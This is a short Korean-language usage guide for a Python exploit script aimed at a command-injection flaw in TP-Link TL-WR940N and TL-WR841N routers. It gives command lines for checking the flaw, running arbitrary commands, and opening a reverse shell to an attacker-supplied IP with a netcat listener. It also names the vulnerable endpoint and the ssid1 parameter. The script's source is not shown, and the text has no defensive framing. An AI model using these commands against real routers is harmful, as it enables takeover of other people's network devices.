
TP-Link TL-WR940N/TL-WR841N 명령어 삽입 취약점을 위한 Python 익스플로잇
기본 취약점 확인:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
사용자 정의 명령 실행:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
리버스 셸 (먼저 리스너 설정: nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
중요 참고 사항:
취약점은 /userRpm/WlanNetworkRpm.htm 엔드포인트의 ssid1 매개변수에 대한 부적절한 입력 검증으로 인해 존재하며, 특별히 조작된 요청을 통해 명령어 주입이 가능합니다.